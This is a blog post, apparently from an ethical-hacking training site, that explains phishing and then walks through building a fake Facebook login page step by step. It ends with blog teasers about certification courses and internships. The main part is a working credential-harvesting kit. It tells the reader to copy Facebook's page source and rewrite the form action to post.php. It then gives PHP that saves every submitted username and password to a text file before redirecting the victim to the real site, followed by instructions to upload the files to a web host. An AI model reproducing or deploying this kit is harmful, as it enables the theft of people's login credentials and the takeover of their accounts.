Skip to main content

What is Facebook Phishing

facebook Phishing

Phishing is the act of fooling a computer user into submitting personal information by creating fake websites that looks like a real (and trusted) sites it is a hacker technique of fishing for password and other secret financial information
Phishing is a type of online identity theft. It uses email and fake website  that are designed to steal your personal data or information such as password, account data, or other information
the facebook phishing page example is given below
Look this is the real facebook page URL but after creating phishing page of the website the website look like same but the URL will change which is redirect the
today we create a facebook phishing page which look similar to a facebook page but it’s not actually a facebook page when victim enter his username and password the phishing page will redirect to the other url
after creating phishing you can see the facebook page look like real facebook page but the url is changed you can see localhost/facebook

steps to create phishing page

step 1:-Go to the Facebook page and then right click on the page, u will see the option view source page,click on that.
step 2:- now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad
step 3:- Now open the notepad and press CTRL+F,and type “ACTION”
step 4:-You will have to find a text which looks like ..
                                       action=https://www.facebook.com/login.php?login_attempt=1
step 5:-delete all the text written in red colour and instead of it write post.php
step 6:-Now save it on your desktop with the name index.htm,not index.html,remember
step 7:-Now your phishing page is ready
step 8:-Open a new notepad and save the given data with the name post.php
<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
step 9:-you have two files now one is index.htm and another is post.php,remember file extension is important
step 10:Now u have to upload it in a web hosting site

Comments

Popular posts from this blog

Certified Ethical Hacker(CEH) Official (CEH) Training and Certification Course

Certified Ethical Hacker (CEH) Official (CEH) Training and Certification Course Certified Ethical Hacker  (CEH)  Training  is a skilled professional who understands and knows how to look for weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a black hate hacker, but Certified Ethical Hacker (ceh)   is work with a lawful  manner to assess the security posture of a target system(s). the  ethical hacking  certification (ceh)  have the power to provide you to better understating  of  ethical hacking  and it’s course (CEH)Certified Ethical Hacker summer Internship  Contents Introduction to Ethical Hacking Foot printing and reconnaissance Foot-printing Active (Tool Based Practical) Foot-printing Passive (Passive Approach) In-depth Network Scanning Enumeration User Identification System Hacking Password Cracking & Bypassing Viruses and Worms Trojan a...

SUMMER INTERNSHIP TRAINING 2018

SUMMER INTERNSHIP 2018 CRAW Security  invites applicants or candidates for its 2018 Summer Internship Program in Computer Science, Information Security, Networking, Web Development , Software Development, Management and Marketing at its locations in New Delhi. We are seeking highly motivated students, who are interested in experiencing an exciting Summer of research. The selected students will have the opportunity to work closely with an outstanding research team on challenging problems that range from leading-edge exploratory work to prototyping real-world systems and applications. During the internship, the students will also have the opportunity to participate in the workshops, competitions, events, live projects of the largest industrial research organization in the world and network with other top students in different fields from other universities. We offer internship positions in various research. Benefits of Summer Internship 2018   ...

Cyber Attack

Cyber Attack computer to computer attacks is called cyber attack Cyber attack is the type of attack which is targeted by the hacker for stealing sensitive information or data now days we can see that the cyber attack is the common thinks when you are on the internet the cyber attacker may be a professional or unprofessional so they may be work for the money or personal benefits the cyber attacker is attacks you when you are on the internet or transferring data on the internet like online banking ,online shopping the cyber attacker my stealing your password card number, account number information for personal benefit the cyber attack is the type of crime which is done by the human for personal benefit as well as for earning purpose so the cyber attacker my damage your hardware or system infrastructure or remote access or monitoring on the system the cyber attacker have some extra skills to find out the vulnerabilities on the system Who launches cyber attacks?  Class...